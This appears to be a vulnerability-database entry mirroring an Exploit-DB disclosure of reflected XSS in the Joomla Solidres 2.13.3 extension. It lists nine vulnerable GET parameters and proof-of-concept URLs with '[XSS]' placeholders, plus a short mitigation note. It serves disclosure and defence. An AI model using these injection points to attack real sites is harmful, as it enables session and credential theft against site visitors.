Joomla Solidres 2.13.3 - Reflected XSS

vendor:

Solidres

by:

CraCkEr

5.5

CVSS

MEDIUM

Reflected XSS

CWE

Product Name: Solidres

Affected Version From: 2.13.3

Affected Version To: 2.13.3

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2023

Joomla Solidres 2.13.3 – Reflected XSS

The attacker can send a malicious URL containing XSS payloads in various GET parameters, allowing them to manipulate the content of the site.

Mitigation:

Validate and sanitize user input to prevent XSS attacks. Implement Content Security Policy (CSP) to restrict the execution of scripts.

Source

Exploit-DB raw data:

# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 28/07/2023
# Vendor: Solidres Team
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
# Demo: http://demo.solidres.com/joomla
# Version: 2.13.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials


GET parameter 'show' is vulnerable to XSS
GET parameter 'reviews' is vulnerable to XSS
GET parameter 'type_id' is vulnerable to XSS
GET parameter 'distance' is vulnerable to XSS
GET parameter 'facilities' is vulnerable to XSS
GET parameter 'categories' is vulnerable to XSS
GET parameter 'prices' is vulnerable to XSS
GET parameter 'location' is vulnerable to XSS
GET parameter 'Itemid' is vulnerable to XSS


https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14



[-] Done